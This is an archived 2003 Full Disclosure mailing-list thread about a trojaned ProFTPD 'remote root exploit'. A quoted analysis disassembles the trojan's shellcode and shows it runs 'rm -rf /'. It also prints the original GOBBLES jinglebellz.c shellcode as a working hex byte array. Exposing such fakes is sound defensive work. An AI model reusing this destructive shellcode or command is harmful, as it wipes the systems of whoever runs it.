Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit)

From: mitch_hurrison () ziplip com
Date: Fri, 24 Oct 2003 16:15:18 -0700 (PDT)
Hi list,

Hrmm. Ok I'm no Sherlock Holmes but even I could see through this
'analysis'. This is obviously an elaborate attempt to soil the reputations of the fine people, dare I say heros of 
information
security, at GOBBLES security. 

Let's examine the case at hand:

1) Someone makes the effort of cutting up an existing public GOBBLES
shellcode. An act that requires just as much effort as writing
original opcode.

2) This cutup version is used in a 'trojan' even my grandmother
would be able to spot. (Obscure in-exploit overflows are way more
effective folks, ask HD "I pioneered screensavers" Moore). 

3) Some random hero pops up on the list pointing out that
'hey, this is GOBBLES shellcode *WINK*'

Now who, on God's green earth, would recognise shellcode from
an obscure exploit that was published months ago. If they
didn't have it fresh in memory? 

So I think it's rather obvious either zeroboy, or one of his
friends is responsible for this trojan. And he has some sort of
rancune towards GOBBLES. Either that or he
has a serious hardon for memorising hex opcode buffers.

With regards,
Mitch


-----Original Message-----
From: zero [mailto:zeroboy () arrakis es]
Sent: Friday, October 24, 2003, 1:19 PM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] ProFTPD-1.2.9rc2 remote root exploit


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hmmm, let's see:

Dump of assembler code for function shellcode:
0x08049480 <shellcode+0>:       xor    %eax,%eax
0x08049482 <shellcode+2>:       push   %eax
0x08049483 <shellcode+3>:       push   $0x582f2066
0x08049488 <shellcode+8>:       push   $0x722d206d
0x0804948d <shellcode+13>:      push   $0x7258632d
0x08049492 <shellcode+18>:      push   $0x41414141
0x08049497 <shellcode+23>:      push   $0x41414141
0x0804949c <shellcode+28>:      push   $0x41414141
0x080494a1 <shellcode+33>:      push   $0x41414141
0x080494a6 <shellcode+38>:      push   $0x4368732f
0x080494ab <shellcode+43>:      push   $0x6e69622f // 
/bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
0x080494b0 <shellcode+48>:      xor    %eax,%eax
0x080494b2 <shellcode+50>:      mov    %al,0x7(%esp,1)
0x080494b6 <shellcode+54>:      mov    %al,0x1a(%esp,1)
0x080494ba <shellcode+58>:      mov    %al,0x23(%esp,1)
0x080494be <shellcode+62>:      mov    %esp,0x8(%esp,1)
0x080494c2 <shellcode+66>:      xor    %ebx,%ebx
0x080494c4 <shellcode+68>:      lea    0x18(%esp,1),%ebx
0x080494c8 <shellcode+72>:      mov    %ebx,0xc(%esp,1)
0x080494cc <shellcode+76>:      xor    %ebx,%ebx
0x080494ce <shellcode+78>:      lea    0x1b(%esp,1),%ebx
0x080494d2 <shellcode+82>:      mov    %ebx,0x10(%esp,1)
0x080494d6 <shellcode+86>:      mov    %eax,0x14(%esp,1)
0x080494da <shellcode+90>:      xor    %ebx,%ebx
0x080494dc <shellcode+92>:      mov    %esp,%ebx
0x080494de <shellcode+94>:      lea    0x8(%esp,1),%ecx
0x080494e2 <shellcode+98>:      xor    %edx,%edx
0x080494e4 <shellcode+100>:     lea    0x14(%esp,1),%edx
0x080494e8 <shellcode+104>:     mov    $0xb,%al
0x080494ea <shellcode+106>:     int    $0x80
0x080494ec <shellcode+108>:     xor    %ebx,%ebx
0x080494ee <shellcode+110>:     xor    %eax,%eax
0x080494f0 <shellcode+112>:     inc    %eax
0x080494f1 <shellcode+113>:     int    $0x80
0x080494f3 <shellcode+115>:     add    %al,(%eax)
End of assembler dump.

Let's give credits to the original c0d3rs of this shellcode. Nobody 
remembers jinglebellz.c?

<snip>
/*
            jinglebellz.c - local/remote exploit for mpg123
            (c) 2003 GOBBLES Security seXForces

[...]

unsigned char linux_shellcode[] = /* contributed by antiNSA */
         "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
         "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
         "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
         "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
         "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
         "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
         "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
         "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
         "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
         "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
         "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
         "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
         "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
         "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
         "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
         "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
         "\x80\x31\xdb\x31\xc0\x40\xcd\x80";

</snip>

Well well, just a nice copy paste of some of it? :pPpPpPppP

And the exact cmd is:
execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})

NOTE: In this one ~ is change for a nicer one /

Have a nice turkey.

Cheerz



www.citfi.org
www.podergeek.com
**********************************
"The further backward you look, the further forward you can see" Winston 
Churchill
"Access is GOD..."

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6
l9RpeQ2ZrufRkkV3dflO1dTB
=kkQd
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: